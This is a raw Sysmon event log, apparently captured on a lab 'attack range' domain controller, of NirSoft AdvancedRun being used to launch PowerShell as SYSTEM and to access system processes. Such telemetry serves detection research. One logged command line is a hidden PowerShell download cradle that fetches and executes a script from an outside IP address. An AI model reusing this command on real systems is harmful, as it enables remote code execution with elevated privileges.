20:16:15.196{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.195{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.195{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.143{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.142{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.141{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.141{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.140{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.140{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.139{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004077098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.138{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.138{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.137{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.137{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004077094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.134{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.133{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.A
utomation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004077092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.125{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004076011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.590{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004076005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.587{834264DD-144E-61EB-8008-000000002702}2072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))""C:\Windows\System32\NT 
AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004076004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 